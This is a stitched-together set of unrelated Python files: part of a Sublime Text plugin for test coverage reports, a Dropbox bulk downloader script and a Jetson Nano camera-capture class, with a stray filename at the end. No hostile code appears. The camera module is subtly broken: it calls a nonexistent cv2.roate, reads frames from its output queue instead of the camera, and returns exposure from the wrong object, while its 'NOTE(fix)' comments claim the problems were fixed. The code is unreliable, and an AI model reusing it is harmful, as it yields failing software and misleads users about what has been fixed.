) """, ( package_name, commit_hash, summary, commit_date, data_bytes, platform, python_version, path_prefix, output )) connection.commit() cursor.close() print('Package Coverage: saved results to coverage database') def done_running_tests(): if self.do_coverage: panel_queue.write('\n') cov.stop() thread_vars['cov_data'] = cov.get_data() buffer = StringIO() cov.report(show_missing=False, file=buffer) old_length = len(package_dir) new_length = len(package_name) + 2 output = buffer.getvalue() thread_vars['all_short'] = False thread_vars['short_package_dir'] = None if sys.platform == 'win32': thread_vars['short_package_dir'] = create_short_path(package_dir) thread_vars['all_short'] = True new_root = '.' + os.sep + package_name new_output = [] for line in output.splitlines(): if re.search('\\s+\\d+\\s+\\d+\\s+\\d+%$', line): if not thread_vars['short_package_dir']: line = line.replace(package_dir, new_root) else: for possible_prefix in [package_dir, thread_vars['short_package_dir']]: if line.startswith(possible_prefix): line = line.replace(possible_prefix, new_root) if possible_prefix == package_dir: thread_vars['all_short'] = False break new_output.append(line) output = '\n'.join(new_output) if thread_vars['all_short']: old_length = len(thread_vars['short_package_dir']) # Shorten the file paths to be relative to the Packages dir output = output.replace('\n' + ('-' * old_length), '\n' + ('-' * new_length)) output = output.replace('Name' + (' ' * (old_length - 4)), 'Name' + (' ' * (new_length - 4))) output = output.replace('TOTAL' + (' ' * (old_length - 5)), 'TOTAL' + (' ' * (new_length - 5))) panel_queue.write(output) if self.html_report: coverage_reports_dir = os.path.join(package_dir, 'dev', 'coverage_reports') if not os.path.exists(coverage_reports_dir): os.mkdir(coverage_reports_dir) report_dir = os.path.join(coverage_reports_dir, 'temp') if not os.path.exists(report_dir): os.mkdir(report_dir) title = '%s coverage report' % package_name 
cov.html_report(directory=report_dir, title=title) html_path = os.path.join(report_dir, 'index.html') if sys.platform != 'win32': html_path = 'file://' + html_path webbrowser.open_new(html_path) panel_queue.write('\x04') threading.Thread( target=display_results, args=(title, panel, panel_queue, db_results_file, done_displaying_results) ).start() if self.ui_thread: run_tests(tests_module, panel_queue, self.name_pattern, done_running_tests) else: threading.Thread( target=run_tests, args=(tests_module, panel_queue, self.name_pattern, done_running_tests) ).start() class PackageCoverageSetDatabasePathCommand(sublime_plugin.WindowCommand): """ Allows the user to set the path to the sqlite database to store coverage data inside of """ def run(self): self.has_project_api = int(sublime.version()) >= 3000 self.has_project = False if self.has_project_api: self.has_project = len(self.window.project_file_name()) > 0 coverage_settings = sublime.load_settings('Package Coverage.sublime-settings') example_location = os.path.expanduser(os.path.join('~', 'Dropbox', 'package_coverage.sqlite')) existing_coverage_database = get_setting( self.window, coverage_settings, 'coverage_database', example_location ) if self.has_project: self.caption = 'Project-Specific Coverage Database Path' else: self.caption = 'User-Specific Coverage Database Path' self.show_input(existing_coverage_database) def show_input(self, initial): """ Displays the input panel to allow the user to specify the coverage database file path :param initial: A unicode string of the path that should initially populate the input field """ self.window.show_input_panel( self.caption, initial, self.on_done, None, None ) def on_done(self, requested_path): """ User input handler for file path to coverage database :param requested_path: A string containing the path the user entered for the coverage db """ requested_dirname = os.path.dirname(requested_path) requested_basename = os.path.basename(requested_path) if requested_basename 
== '': sublime.error_message(format_message(''' Package Coverage No filename provided for coverage database ''')) self.show_input(requested_path) return if not os.path.exists(requested_dirname) or not os.path.dirname(requested_dirname): sublime.error_message(format_message( ''' Package Coverage Folder provided for coverage database does not exist: %s ''', [requested_dirname] )) self.show_input(requested_path) return if self.has_project: project_data = self.window.project_data() if 'settings' not in project_data: project_data['settings'] = {} if 'Package Coverage' not in project_data['settings']: project_data['settings']['Package Coverage'] = {} project_data['settings']['Package Coverage']['coverage_database'] = requested_path self.window.set_project_data(project_data) else: coverage_settings = sublime.load_settings('Package Coverage.sublime-settings') coverage_settings.set('coverage_database', requested_path) sublime.save_settings('Package Coverage.sublime-settings') sublime.status_message('Package Coverage coverage database path saved') class PackageCoverageDisplayReportCommand(sublime_plugin.WindowCommand): """ Allows the user to pick a commit and show a report of coverage details in their browser """ def run(self): testable_packages = find_testable_packages() if not testable_packages: sublime.error_message(format_message(''' Package Coverage No testable packages could be found ''')) return settings = sublime.load_settings('Package Coverage.sublime-settings') self.coverage_database = get_setting(self.window, settings, 'coverage_database') self.packages = testable_packages self.window.show_quick_panel(testable_packages, self.selected_package) def selected_package(self, index): """ User input handler for user selecting package :param index: An integer index of the package name in self.packages - -1 indicates user cancelled operation """ if index == -1: return package_name = self.packages[index] settings = sublime.load_settings('Package Coverage.sublime-settings') 
coverage_database = get_setting(self.window, settings, 'coverage_database') self.package_name = package_name self.coverage_database = coverage_database thread = threading.Thread(target=self.find_commits, args=(package_name, coverage_database)) thread.start() def find_commits(self, package_name, coverage_database): """ Queries the SQLite coverage database to fetch commits the use can pick from. RUNS IN A THREAD :param package_name: A unicode string of the package name :param coverage_database: The filename of the coverage database """ connection = open_database(coverage_database) cursor = connection.cursor() cursor.execute(""" SELECT commit_hash, MAX(commit_date) AS commit_date, MAX(commit_summary) AS commit_summary FROM coverage_results WHERE project = ? GROUP BY project, commit_hash ORDER BY MAX(commit_date) DESC """, (package_name,)) hashes = [] titles = [] for row in cursor: title = '%s %s (%s)' % ( row['commit_hash'], row['commit_summary'], re.sub('\\..*$', '', row['commit_date']) ) hashes.append(row['commit_hash']) titles.append(title) cursor.close() connection.close() # Since this method is running in a thread, we schedule the results in # the main Sublime Text UI thread sublime.set_timeout(lambda: self.show_commits(hashes, titles), 10) def show_commits(self, commit_hashes, commit_titles): """ Displays a list of commits with coverage results for the specified package :param commit_hashes: A list of unicode strings of git SHA1 hashes :param commit_titles: A list of unicode strings of commit titles for the user to pick from """ if not commit_hashes: sublime.error_message(format_message( ''' Package Coverage No coverage results exists for %s ''', [self.package_name] )) return self.hashes = commit_hashes self.titles = commit_titles self.window.show_quick_panel(commit_titles, self.selected_commit) def selected_commit(self, index): """ User input handler for quick panel selection of commit hash :param index: An integer of the commit chosen from self.hashes - -1 
indicates that the user cancelled the operation """ if index == -1: return commit_hash = self.hashes[index] package_dir = os.path.join(sublime.packages_path(), self.package_name) args = (self.package_name, package_dir, self.coverage_database, commit_hash) thread = threading.Thread(target=self.generate_report, args=args) thread.start() def generate_report(self, package_name, package_dir, coverage_database, commit_hash): """ Loads all of the coverage data in the database for the commit specified and generates an HTML report, opening it in the user's web browser RUNS IN A THREAD :param package_name: A unicode string of the package to generate the report for :param package_dir: A unicode string of the path to the package's directory :param coverage_database: A unicode string of the path to the SQLite coverage database :param commit_hash: A unicode string of the git SHA1 hash of the commit to display the results for """ connection = open_database(coverage_database) cursor = connection.cursor() cursor.execute(""" SELECT path_prefix, data, commit_summary FROM coverage_results WHERE project = ? AND commit_hash = ? 
ORDER BY commit_date ASC """, (package_name, commit_hash)) commit_summary = None data = coverage.CoverageData() for row in cursor: if commit_summary is None: commit_summary = row['commit_summary'] byte_string = StringIO() byte_string.write(row['data']) byte_string.seek(0) temp_data = coverage.CoverageData() temp_data.read_fileobj(byte_string) aliases = coverage.files.PathAliases() aliases.add(row['path_prefix'], package_dir + os.sep) data.update(temp_data, aliases) cursor.close() connection.close() coverage_reports_dir = os.path.join(package_dir, 'dev', 'coverage_reports') if not os.path.exists(coverage_reports_dir): os.mkdir(coverage_reports_dir) report_dir = os.path.join(coverage_reports_dir, commit_hash) if not os.path.exists(report_dir): os.mkdir(report_dir) data_file_path = os.path.join(report_dir, '.coverage') data.write_file(data_file_path) cov = coverage.Coverage(data_file=data_file_path) cov.load() title = '%s (%s %s) coverage report' % (package_name, commit_hash, commit_summary) cov.html_report(directory=report_dir, title=title) html_path = os.path.join(report_dir, 'index.html') if sys.platform != 'win32': html_path = 'file://' + html_path webbrowser.open_new(html_path) class PackageCoverageCleanupReportsCommand(sublime_plugin.WindowCommand): """ Deletes all HTML coverage reports currently on disk """ def run(self): testable_packages = find_testable_packages() if not testable_packages: sublime.error_message(format_message(''' Package Coverage No cleanable packages could be found ''')) return self.packages_path = sublime.packages_path() cleanable_packages = [] for testable_package in testable_packages: coverage_reports_dir = os.path.join(self.packages_path, testable_package, 'dev', 'coverage_reports') if not os.path.exists(coverage_reports_dir): continue has_dir = False for entry in os.listdir(coverage_reports_dir): if entry in set(['.', '..']): continue if not os.path.isdir(os.path.join(coverage_reports_dir, entry)): continue has_dir = True break if 
has_dir: cleanable_packages.append(testable_package) if not cleanable_packages: sublime.error_message(format_message(''' Package Coverage No cleanable packages could be found ''')) return self.packages = cleanable_packages self.window.show_quick_panel(cleanable_packages, self.selected_package) def selected_package(self, index): """ User input handler for user selecting package :param index: An integer index of the package name in self.packages - -1 indicates user cancelled operation """ if index == -1: return package_name = self.packages[index] coverage_reports_dir = os.path.join(self.packages_path, package_name, 'dev', 'coverage_reports') thread = threading.Thread(target=self.clean_dirs, args=(package_name, coverage_reports_dir)) thread.start() def clean_dirs(self, package_name, coverage_reports_dir): """ Deletes old coverage report dirs from a package's dev/coverage_reports/ directory. RUNS IN A THREAD :param package_name: A unicode string of the package name :param coverage_reports_dir: A unicode string of the path to the directory to clean out """ for entry in os.listdir(coverage_reports_dir): if entry in set(['.', '..']): continue entry_path = os.path.join(coverage_reports_dir, entry) if not os.path.isdir(entry_path): continue if not re.match('^[a-f0-9]{6,}$', entry): continue shutil.rmtree(entry_path) # Since this method is running in a thread, we schedule the result # notice to be run from the main UI thread def show_completed(): message = 'Package Coverage: coverage reports successfully cleaned for %s' % package_name sublime.status_message(message) sublime.set_timeout(show_completed, 10) def get_setting(window, settings, name, default=None): """ Retrieves a setting from the current project, of the editor-wide Package Coverage settings file. 
:param window: The current sublime.Window object :param settings: The sublime.Settings object for Package Coverage.sublime-settings :param name: A unicode string of the name of the setting to retrieve :param default: A the value to use if the setting is not currently set :return: The setting value, or the default value """ window_settings = window.active_view().settings().get('Package Coverage', {}) if name in window_settings: return window_settings[name] return settings.get(name, default) class StringQueue(): """ An output data sink for unittest that is used to fetch output to display in an output panel """ def __init__(self): self.lock = threading.Lock() self.queue = '' def write(self, data): self.lock.acquire() self.queue += data self.lock.release() def get(self): self.lock.acquire() output = self.queue self.queue = '' self.lock.release() return output def flush(self): pass def create_resources(window, package_name, package_dir): """ Prepares resources to run tests, including: 1. Loading the dev/tests.py module from a package 2. 
Creating a sublime.View output panel to display the results :param window: A sublime.Window object that the output panel will be created within :param package_name: A unicode string of the name of the package to test :param package_dir: A unicode string of the filesystem path to the folder containing the package :return: A 2-element tuple of: (tests module, sublime.View object) """ panel = window.get_output_panel('%s_tests' % package_name) panel.settings().set('word_wrap', True) panel.settings().set("auto_indent", False) panel.settings().set("tab_width", 2) if sys.version_info >= (3,): old_path = os.getcwd() else: old_path = os.getcwdu() reloader_path = os.path.join(package_dir, 'dev', 'reloader.py') os.chdir(package_dir) dev_module_name = '%s.dev' % package_name tests_module_name = '%s.dev.tests' % package_name reloader_module_name = '%s.dev.reloader' % package_name if os.path.exists(reloader_path): if reloader_module_name in sys.modules: reload(sys.modules[reloader_module_name]) else: reloader_module_info = imp.find_module('reloader', [os.path.join(package_dir, 'dev')]) imp.load_module(reloader_module_name, *reloader_module_info) if tests_module_name in sys.modules: tests_module = sys.modules[tests_module_name] reload(tests_module) else: dev_module_info = imp.find_module('dev', [package_dir]) imp.load_module(dev_module_name, *dev_module_info) tests_module_info = imp.find_module('tests', [os.path.join(package_dir, 'dev')]) tests_module = imp.load_module(tests_module_name, *tests_module_info) os.chdir(old_path) return (tests_module, panel) def display_results(headline, panel, panel_queue, db_results_file, on_done): """ Displays the results of a test run :param headline: A unicode string title to display in the output panel :param panel: A sublime.View to write the results to :param panel_queue: The StringQueue object to fetch test results from :param db_results_file: None or a StringIO object so output can be saved in the coverage database :param on_done: A 
callback to execute when the results are done being printed """ # We use a function here so that chars is not redefined in the while # loop before the timeout get fired if sys.version_info >= (3,): def write_to_panel(chars): sublime.set_timeout(lambda: panel.run_command('insert', {'characters': chars}), 10) else: def do_write(chars): edit = panel.begin_edit('package_coverage_insert', []) panel.insert(edit, panel.size(), chars) panel.end_edit(edit) def write_to_panel(chars): sublime.set_timeout(lambda: do_write(chars), 10) write_to_panel('%s\n\n ' % headline) while True: chars = panel_queue.get() wrapped_chars = chars.replace('\n', '\n ') if chars == '': time.sleep(0.05) continue if chars[-1] == '\x04': chars = chars[0:-1] if db_results_file: db_results_file.write(chars) wrapped_chars = wrapped_chars[0:-1] write_to_panel(wrapped_chars) break if db_results_file: db_results_file.write(chars) write_to_panel(wrapped_chars) on_done() def run_tests(tests_module, queue, name_pattern, on_done): """ Executes the tests within a module and sends the output through the queue for display via another thread :param tests_module: The module that contains unittest.TestCase classes to execute :param queue: A StringQueue object to send the results to :param name_pattern: None or a re._pattern_type object for matching test names against :param on_done: A callback to execute when the tests are done being run """ test_classes = [] for name, obj in inspect.getmembers(tests_module): if inspect.isclass(obj) and issubclass(obj, unittest.TestCase): test_classes.append(obj) suite = unittest.TestSuite() loader = unittest.TestLoader() for test_class in test_classes: if name_pattern: for name in loader.getTestCaseNames(test_class): if name_pattern.search(name): suite.addTest(test_class(name)) else: suite.addTest(loader.loadTestsFromTestCase(test_class)) verbosity = 2 if name_pattern else 1 unittest.TextTestRunner(stream=queue, verbosity=verbosity).run(suite) on_done() def 
git_commit_info(package_dir): """ Get the git SHA1 hash, commit date and summary for the current git commit :param package_dir: A unicode string of the filesystem path to the folder containing the package :return: A tuple containing: [0] A unicode string of the short commit hash [1] A datetime.datetime object of the commit date [2] A unicode string of the commit message summary """ startupinfo = None if sys.platform == 'win32': startupinfo = subprocess.STARTUPINFO() startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW _, env = shellenv.get_env(for_subprocess=True) proc = subprocess.Popen( ['git', 'log', '-n', '1', "--pretty=format:%h %at %s", 'HEAD'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, cwd=package_dir, startupinfo=startupinfo ) stdout, stderr = proc.communicate() if stderr: raise OSError(stderr.decode('utf-8').strip()) parts = stdout.decode('utf-8').strip().split(' ', 2) return (parts[0], datetime.utcfromtimestamp(int(parts[1])), parts[2]) def is_git_clean(package_dir): """ Detects if the git repository is currently all committed :param package_dir: A unicode string of the filesystem path to the folder containing the package :return: A boolean - if the repository is clean """ startupinfo = None if sys.platform == 'win32': startupinfo = subprocess.STARTUPINFO() startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW _, env = shellenv.get_env(for_subprocess=True) proc = subprocess.Popen( ['git', 'status', '--porcelain'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, cwd=package_dir, startupinfo=startupinfo ) stdout, stderr = proc.communicate() if stderr: raise OSError(stderr.decode('utf-8').strip()) return len(stdout.decode('utf-8').strip()) == 0 def open_database(coverage_database): """ Opens and, if needed, initializes the coverage database for saving results :param coverage_database: A unicode string of the path to the sqlite file to use as the database :return: A Python sqlite3.Connection object """ connection = 
sqlite3.connect(coverage_database, detect_types=sqlite3.PARSE_DECLTYPES) connection.row_factory = sqlite3.Row cursor = connection.cursor() cursor.execute(""" SELECT name FROM sqlite_master WHERE type = 'table' AND name = 'coverage_results' """) if len(cursor.fetchall()) != 1: if sys.version_info >= (3,): sql_bytes = sublime.load_binary_resource('Packages/Package Coverage/coverage.sql') else: dirname = os.path.dirname(__file__) with open(os.path.join(dirname, 'coverage.sql'), 'rb') as f: sql_bytes = f.read() sql = sql_bytes.decode('utf-8') cursor.execute(sql) cursor.close() return connection def find_testable_packages(): """ Returns a list of unicode strings containing testable packages :return: A list of unicode strings of package names """ testable_packages = [] packages_dir = sublime.packages_path() for name in os.listdir(packages_dir): if name[0] == '.': continue subdir_path = os.path.join(packages_dir, name) if not os.path.isdir(subdir_path): continue tests_path = os.path.join(subdir_path, 'dev', 'tests.py') if not os.path.exists(tests_path): continue testable_packages.append(name) return testable_packages def format_message(string, params=None, strip=True, indent=None): """ Takes a multi-line string and does the following: - dedents - removes a single leading newline if the second character is not a newline also - converts newlines with text before and after into a single line - removes a single trailing newline if the second-to-laster character is not a newline also :param string: The string to format :param params: Params to interpolate into the string :param strip: If the last newline in the string should be removed :param indent: If all lines should be indented by a set indent after being dedented :return: The formatted string """ output = string # Only dedent if not a single-line string. This allows for # single-line-formatted string to be printed that include intentional # whitespace. 
if output.find('\n') != -1: output = dedent(output) # If the string starts with just a newline, we want to trim it because # it is a side-effect of the code formatting, but if there are two newlines # then that means we intended there to be newlines at the beginning if output[0] == '\n' and output[1] != '\n': output = output[1:] # Unwrap lines, taking into account bulleted lists, ordered lists and # underlines consisting of = signs if output.find('\n') != -1: output = re.sub('(?<=\\S)\n(?=[^ \n\t\\d\\*\\-=])', ' ', output) # By default we want to trim a single trailing newline from a string since # that is likely from the code formatting, but that trimming is prevented # if strip == False, or if there are two trailing newlines, which means we # actually wanted whitespace at the end if output[-1] == '\n' and strip and output[-2] != '\n': output = output[0:-1] if params is not None: output = output % params if indent is not None: output = indent + output.replace('\n', '\n' + indent) return output if sys.platform == 'win32': def create_short_path(path): """ Returns the 8.3 formatted version of a path, if available :param path: A unicode string of a file path :return: None if no 8.3 path, otherwise a unicode string of the short path """ short_path = path buf = create_unicode_buffer(512) if windll.kernel32.GetShortPathNameW(path, buf, len(buf)): short_path = buf.value if short_path != path: return short_path return None
downloader.py
import os
import sqlite3
from getpass import getpass
import multiprocessing

import dropbox
from tqdm import tqdm
import pathlib


def wrapper(token: str, arg_list, queue: multiprocessing.Queue):
    """Worker process: download every (dropbox_path, download_path) pair.

    Puts a ``(dropbox_path, success)`` tuple on ``queue`` for EVERY task --
    including failures.  NOTE(fix): previously a failed download put nothing
    on the queue, so main()'s ``queue.get()`` loop (sized ``len(tasks)``)
    blocked forever as soon as a single download raised.

    :param token: Dropbox API access token
    :param arg_list: list of (dropbox_path, download_path) tuples
    :param queue: result queue shared with the parent process
    """
    dbx = dropbox.Dropbox(token)
    for (dropbox_path, download_path) in arg_list:
        try:
            dbx.files_download_to_file(download_path, dropbox_path)
            queue.put((dropbox_path, True))
        except Exception as e:
            # Best-effort: report the error but keep downloading the rest.
            print(e)
            queue.put((dropbox_path, False))


def main():
    """Resume the pending downloads recorded in task_list_db.sqlite."""
    # Prefer a token from the environment so the script can run unattended.
    if 'DROPBOX_TOKEN' in os.environ:
        _token = os.environ['DROPBOX_TOKEN']
    else:
        _token = getpass('Enter your access token: ')

    p = pathlib.Path('task_list_db.sqlite')
    if not p.exists():
        raise FileNotFoundError('task_list_db.sqlite not found')
    sql = sqlite3.connect(p)
    tasks = sql.execute('SELECT DROPBOX_PATH, DOWNLOAD_PATH FROM TASKS WHERE STATUS = 0').fetchall()

    num_procs = 8
    queue: multiprocessing.Queue = multiprocessing.Queue()
    # Split tasks into num_procs roughly-equal slices; the last slice absorbs
    # the remainder so every task is assigned exactly once.
    chunk = len(tasks) // num_procs
    lists = [tasks[chunk * i: chunk * (i + 1)] for i in range(num_procs - 1)]
    lists.append(tasks[chunk * (num_procs - 1):])
    procs = [multiprocessing.Process(target=wrapper, args=(_token, x, queue)) for x in lists]
    for proc in procs:
        proc.start()

    # Exactly len(tasks) results arrive (success or failure), so this loop
    # always terminates even when some downloads fail.
    for _i in tqdm(range(len(tasks))):
        done_dropbox_path, success = queue.get()
        if success:
            # Failures stay at STATUS = 0 and are retried on the next run.
            sql.execute('UPDATE TASKS SET STATUS = 1 WHERE DROPBOX_PATH = ?', (done_dropbox_path,))
            sql.commit()
        tqdm.write(done_dropbox_path)

    for proc in procs:
        proc.join()
    sql.close()
    print('Done!')


if __name__ == '__main__':
    main()
nanocapture.py
###############################################################################
# CSI video capture on Jetson Nano using gstreamer
# Latency can be 100-200ms
# Urs Utzinger,
#
# 2021, Initialize
# 2020, Update Queue
# 2019, First release
###############################################################################

###############################################################################
# Imports
###############################################################################

# Multi Threading
from threading import Thread, Lock
from queue import Queue

# System
import logging, time, os

# Open Computer Vision
import cv2

###############################################################################
# Video Capture
###############################################################################

class nanoCapture(Thread):
    """
    This thread continually captures frames from a CSI camera on Jetson Nano.

    Frames are pushed into ``self.capture`` as (timestamp_ms, image) tuples;
    log records are pushed into ``self.log`` as (level, message) tuples.
    """

    # Initialize the Camera Thread
    # Opens Capture Device and Sets Capture Properties
    def __init__(self, configs, camera_num: int = 0, res: tuple = None,
                 exposure: float = None):
        """Populate the capture settings and open the camera.

        :param configs: dict of settings ('exposure', 'camera_res',
            'output_res', 'fps', 'flip'); used when the matching keyword
            argument is not supplied
        :param camera_num: camera / V4L2 device number
        :param res: optional (width, height) capture-resolution override
        :param exposure: optional exposure override in microseconds
            (<= 0 selects auto exposure in the gstreamer pipeline)
        """
        # NOTE(fix): the annotation previously read ``res: tuple(int, int)``,
        # which *calls* tuple() while the class body executes and raises
        # TypeError before the module can even be imported.

        # populate desired settings from configuration file or function call
        ####################################################################
        self.camera_num = camera_num
        if exposure is not None:
            self._exposure = exposure
        else:
            self._exposure = configs['exposure']
        if res is not None:
            self._camera_res = res
        else:
            self._camera_res = configs['camera_res']
        self._capture_width = self._camera_res[0]
        self._capture_height = self._camera_res[1]
        self._output_res = configs['output_res']
        self._output_width = self._output_res[0]
        self._output_height = self._output_res[1]
        self._framerate = configs['fps']
        self._flip_method = configs['flip']

        # Threading Queues: captured frames and log messages
        self.capture = Queue(maxsize=32)
        self.log = Queue(maxsize=32)
        self.stopped = True
        self.cam_lock = Lock()

        # open up the camera
        # NOTE(fix): was ``self._open_cam()``; the method defined below is
        # named ``_open_capture`` -- the old call raised AttributeError.
        self._open_capture()

        # Init vars
        self.frame_time = 0.0
        self.measured_fps = 0.0

        Thread.__init__(self)
Stop and Update Thread ################################################################### def stop(self): """stop the thread""" self.stopped = True def start(self, capture_queue = None): """set the thread start conditions""" self.stopped = False T = Thread(target=self.update) T.daemon = True # run in background T.start() # After Stating of the Thread, this runs continously def update(self): """run the thread""" last_time = time.time() num_frames = 0 while not self.stopped: current_time = time.time() # Get New Image if self.cam is not None: with self.cam_lock: _, img = self.capture.read() num_frames += 1 self.frame_time = int(current_time*1000) if (img is not None) and (not self.capture.full()): if (self._output_height > 0) or (self._flip_method > 0): # adjust output height img_resized = cv2.resize(img, self._output_res) # flip resized image if self._flip_method == 0: # no flipping img_proc = img_resized elif self._flip_method == 1: # ccw 90 img_proc = cv2.roate(img_resized, cv2.ROTATE_90_COUNTERCLOCKWISE) elif self._flip_method == 2: # rot 180, same as flip lr & up img_proc = cv2.roate(img_resized, cv2.ROTATE_180) elif self._flip_method == 3: # cw 90 img_proc = cv2.roate(img_resized, cv2.ROTATE_90_CLOCKWISE) elif self._flip_method == 4: # horizontal img_proc = cv2.flip(img_resized, 0) elif self._flip_method == 5: # upright diagonal. 
ccw & lr img_proc = cv2.flip(cv2.roate(img_resized, cv2.ROTATE_90_COUNTERCLOCKWISE), 1) elif self._flip_method == 6: # vertical img_proc = cv2.flip(img_resized, 1) elif self._flip_method == 7: # upperleft diagonal img_proc = cv2.transpose(img_resized) else: img_proc = img_resized # not a valid flip method else: img_proc = img self.capture.put_nowait((current_time*1000., img_proc)) else: self.log.put_nowait((logging.WARNING, "NanoCap:Capture Queue is full!")) # FPS calculation if (current_time - last_time) >= 5.0: # update frame rate every 5 secs self.measured_fps = num_frames/5.0 self.log.put_nowait((logging.INFO, "NANOCAM:FPS:{}".format(self.measured_fps))) last_time = current_time num_frames = 0 self.cam.release() def gstreamer_pipeline( capture_width=1920, capture_height=1080, output_width=1280, output_height=720, framerate=30, exposure_time=-1, # microseconds flip_method=0): """ Create gstreamer pipeline string """ ################################################################################### # gstreamer Options # Examples for IX279 ################################################################################### # 'timeout=0 ' # 0 - 2147483647 # 'blocksize=-1 ' # block size in bytes # 'num-buffers=-1 ' # -1..2147483647 (-1=ulimited) # # num buf before sending EOS # 'sensor-mode=-1 ' # -1..255, IX279 # # 0 (3264x2464,21fps) # # 1 (3264x1848,28fps) # # 2 (1080p, 30fps) # # 3 (720p, 60fps) # # 4 (720p, 120fps) # 'tnr-strength=-1 ' # -1..1 # 'tnr-mode=1 ' # 0,1,2 # # edge enhancement does not accept settings # #'ee-mode=0' # 0,1,2 # #'ee-strength=-1 ' # -1..1 # 'aeantibanding=1 ' # 0..3, off,auto,50,60Hz # 'bufapi-version=false ' # new buffer api # 'maxperf=true ' # max performance # 'silent=true ' # verbose output # 'saturation=1 ' # 0..2 # 'wbmode=1 ' # white balance mode, 0..9 0=off 1=auto # 'awblock=false ' # auto white balance lock # 'aelock=true ' # auto exposure lock # 'exposurecompensation=0 ' # -2..2 # 'exposuretimerange=' # # 'gainrange="1.0 
10.625" ' # "1.0 10.625" # 'ispdigitalgainrange="1 8" ' # 'flip-method=0 # Flip options # # 0=norotation # # 1=ccw90deg # # 2=rotation180 # # 3=cw90 # # 4=horizontal # # 5=uprightdiagonal flip # # 6=vertical # # 7=uperleft flip ################################################################################### if exposure_time <= 0: # auto exposure ################ nvarguscamerasrc_str = ( 'nvarguscamerasrc ' + 'do-timestamp=true ' + 'maxperf=false ' + 'silent=true ' + 'awblock=false ' + 'aelock=false ' + 'exposurecompensation=0 ') else: # static exposure ################# exposure_time = exposure_time * 1000 # microseconds to ns exp_time_str = '"' + str(exposure_time) + ' ' + str(exposure_time) + '" ' nvarguscamerasrc_str = ( 'nvarguscamerasrc ' + 'name="NanoCam" ' + 'do-timestamp=true ' + 'timeout=0 ' + 'blocksize=-1 ' + 'num-buffers=-1 ' + 'sensor-mode=-1 ' + 'tnr-strength=-1 ' + 'tnr-mode=1 ' + 'aeantibanding=1 ' + 'bufapi-version=false ' + 'maxperf=true ' + 'silent=true ' + 'saturation=1 ' + 'wbmode=1 ' + 'awblock=false ' + 'aelock=true ' + 'exposurecompensation=0 ' + 'exposuretimerange=' + exp_time_str) # deal with auto resizing if output_height <= 0: output_height = capture_height if output_width <=0: output_width = capture_width gstreamer_str = ( '! video/x-raw(memory:NVMM), ' + 'width=(int){:d}, '.format(capture_width) + 'height=(int){:d}, '.format(capture_height) + 'format=(string)NV12, ' + 'framerate=(fraction){:d}/1 '.format(framerate) + '! nvvidconv flip-method={:d} '.format(flip_method) + '! video/x-raw, width=(int){:d}, height=(int){:d}, format=(string)BGRx '.format(output_width,output_height) + '! videoconvert ' + '! video/x-raw, format=(string)BGR ' + '! 
appsink') return ( nvarguscamerasrc_str + gstreamer_str ) # # Setup the Camera ############################################################################ def _open_capture(self): """ Open up the camera so we can begin capturing frames """ self.gst=self.gstreamer_pipeline( capture_width = self._capture_width, capture_height = self._capture_height, output_width = self._output_width, output_height = self._output_height, framerate = self._framerate, exposure_time = self._exposure, flip_method = self._flip_method) self.log.put_nowait((logging.INFO, self.gst)) self.cam = cv2.VideoCapture(self.gst, cv2.CAP_GSTREAMER) self.cam_open = self.cam.isOpened() if not self.cam_open: self.log.put_nowait((logging.CRITICAL, "NanoCap:Failed to open camera!")) # Camera Routines ################################################################## # OpenCV interface # Works for Sony IX219 #cap.get(cv2.CAP_PROP_BRIGHTNESS) #cap.get(cv2.CAP_PROP_CONTRAST) #cap.get(cv2.CAP_PROP_SATURATION) #cap.get(cv2.CAP_PROP_HUE) #cap.get(cv2.CAP_PROP_FRAME_WIDTH) #cap.get(cv2.CAP_PROP_FRAME_HEIGHT) #cap.get(cv2.CAP_PROP_FPS) #V4L2 interface #Works for Sonty IX219 #v4l2-ctl --set-ctrl exposure= 13..683709 #v4l2-ctl --set-ctrl gain= 16..170 #v4l2-ctl --set-ctrl frame_rate= 2000000..120000000 #v4l2-ctl --set-ctrl low_latency_mode=True #v4l2-ctl --set-ctrl bypass_mode=Ture #os.system("v4l2-ctl -c exposure_absolute={} -d {}".format(val,self.camera_num)) # Read properties @property def exposure(self): if self.cam_open: return self.capture._exposure else: return float("NaN") @exposure.setter def exposure(self, val): if val is None: return val = int(val) self._exposure = val if self.cam_open: with self.cam_lock: os.system("v4l2-ctl -c exposure_absolute={} -d {}".format(val, self.camera_num)) self.log.put_nowait((logging.INFO, "NanoCap:Exposure:{}".format(self._exposure))) else: self.log.put_nowait((logging.ERROR, "NanoCap:Failed to set exposure to{}!".format(val))) 
###############################################################################
# Testing
###############################################################################
if __name__ == '__main__':
    configs = {
        'camera_res'  : (1280, 720),    # width & height
        'exposure'    : 10000,          # microseconds, internally converted to nano seconds, <= 0 autoexposure
        'fps'         : 60,
        'output_res'  : (-1, -1),       # Output resolution; -1 keeps capture size
        'flip'        : 4,              # 0=norotation 1=ccw90deg 2=rotation180 3=cw90
                                        # 4=horizontal 5=upright diagonal flip
                                        # 6=vertical 7=uperleft diagonal flip
        'displayfps'  : 30
    }

    logging.basicConfig(level=logging.DEBUG)
    logger = logging.getLogger("Nano Capture")

    logger.log(logging.DEBUG, "Starting Capture")
    camera = nanoCapture(configs, camera_num=0)
    camera.start()

    logger.log(logging.DEBUG, "Getting Frames")
    window_handle = cv2.namedWindow("Nano CSI Camera", cv2.WINDOW_AUTOSIZE)
    while cv2.getWindowProperty("Nano CSI Camera", 0) >= 0:
        try:
            # Blocks until a frame is available from the capture thread.
            (frame_time, frame) = camera.capture.get()
            cv2.imshow('Nano CSI Camera', frame)
        except Exception:
            # NOTE(fix): was a bare ``except:`` which also swallowed
            # KeyboardInterrupt / SystemExit and made Ctrl-C unusable.
            pass
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
        try:
            # Drain one pending log record per display iteration, if any.
            (level, msg) = camera.log.get_nowait()
            logger.log(level, "NanoCap:{}".format(msg))
        except Exception:
            pass

    camera.stop()
    cv2.destroyAllWindows()
autoreload.py
